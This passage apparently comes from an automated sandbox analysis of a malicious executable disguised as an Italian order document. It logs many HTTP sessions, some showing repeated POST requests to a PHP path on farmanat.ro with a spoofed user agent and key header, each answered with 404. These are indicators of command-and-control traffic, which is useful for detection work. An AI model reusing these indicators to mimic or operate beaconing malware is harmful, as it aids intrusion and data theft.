                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              360192.168.11.2050203176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              361192.168.11.2050204176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              362192.168.11.2050205176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              363192.168.11.2050206176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              364192.168.11.2050207176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              365192.168.11.2050208176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              366192.168.11.2050209176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              367192.168.11.2050211176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              368192.168.11.2050212176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              369192.168.11.2050213176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              37192.168.11.2049873176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:25.780947924 CET6362OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:25.867208958 CET6362INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              370192.168.11.2050214176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              371192.168.11.2050215176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              372192.168.11.2050216176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              373192.168.11.2050217176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              374192.168.11.2050218176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              375192.168.11.2050219176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              376192.168.11.2050220176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              377192.168.11.2050221176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              378192.168.11.2050222176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              379192.168.11.2050223176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              38192.168.11.2049874176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:26.412909985 CET6363OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:26.499762058 CET6364INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              380192.168.11.2050224176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              381192.168.11.2050225176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              382192.168.11.2050226176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              383192.168.11.2050227176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              384192.168.11.2050228176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              385192.168.11.2050229176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              386192.168.11.2050230176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              387192.168.11.2050231176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              388192.168.11.2050232176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              389192.168.11.2050233176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              39192.168.11.2049875176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:27.083163977 CET6364OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:27.176875114 CET6365INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              390192.168.11.2050234176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              391192.168.11.2050235176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              392192.168.11.2050236176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              393192.168.11.2050237176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              394192.168.11.2050238176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              395192.168.11.2050239176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              396192.168.11.2050240176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              397192.168.11.2050241176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              398192.168.11.2050242176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              399192.168.11.2050243176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.11.2049823176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:02.549129009 CET6304OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:02.669756889 CET6305INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              40192.168.11.2049876176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:27.693461895 CET6366OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:27.784121037 CET6366INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              400192.168.11.2050244176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              401192.168.11.2050245176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              402192.168.11.2050246176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              403192.168.11.2050247176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              404192.168.11.2050248176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              405192.168.11.2050249176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              406192.168.11.2050250176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              407192.168.11.2050251176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              408192.168.11.2050252176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              409192.168.11.2050253176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              41192.168.11.2049877176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:28.273850918 CET6367OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:28.358525038 CET6368INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              410192.168.11.2050254176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              411192.168.11.2050255176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              412192.168.11.2050256176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              413192.168.11.2050257176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              414192.168.11.2050258176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              415192.168.11.2050259176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              416192.168.11.2050260176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              417192.168.11.2050261176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              418192.168.11.2050262176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              419192.168.11.2050263176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              42192.168.11.2049878176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:28.858505011 CET6368OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:28.941189051 CET6369INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              420192.168.11.2050264176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              421192.168.11.2050265176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              422192.168.11.2050266176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              423192.168.11.2050267176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              424192.168.11.2050268176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              425192.168.11.2050269176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              426192.168.11.2050270176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              427192.168.11.2050271176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              428192.168.11.2050272176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              429192.168.11.2050273176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              43192.168.11.2049879176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:29.436238050 CET6370OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:29.519896030 CET6370INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              430192.168.11.2050274176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              431192.168.11.2050275176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              432192.168.11.2050276176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              433192.168.11.2050277176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              434192.168.11.2050278176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              435192.168.11.2050279176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              436192.168.11.2050280176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              437192.168.11.2050281176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              438192.168.11.2050282176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              439192.168.11.2050283176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              44192.168.11.2049880176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:29.956862926 CET6371OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:30.042423010 CET6372INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              440192.168.11.2050284176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              441192.168.11.2050285176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              442192.168.11.2050286176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              443192.168.11.2050287176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              444192.168.11.2050288176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              445192.168.11.2050289176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              446192.168.11.2050290176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              447192.168.11.2050291176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              448192.168.11.2050292176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              449192.168.11.2050293176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              45192.168.11.2049881176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:30.618581057 CET6372OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:30.704024076 CET6373INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              450192.168.11.2050294176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
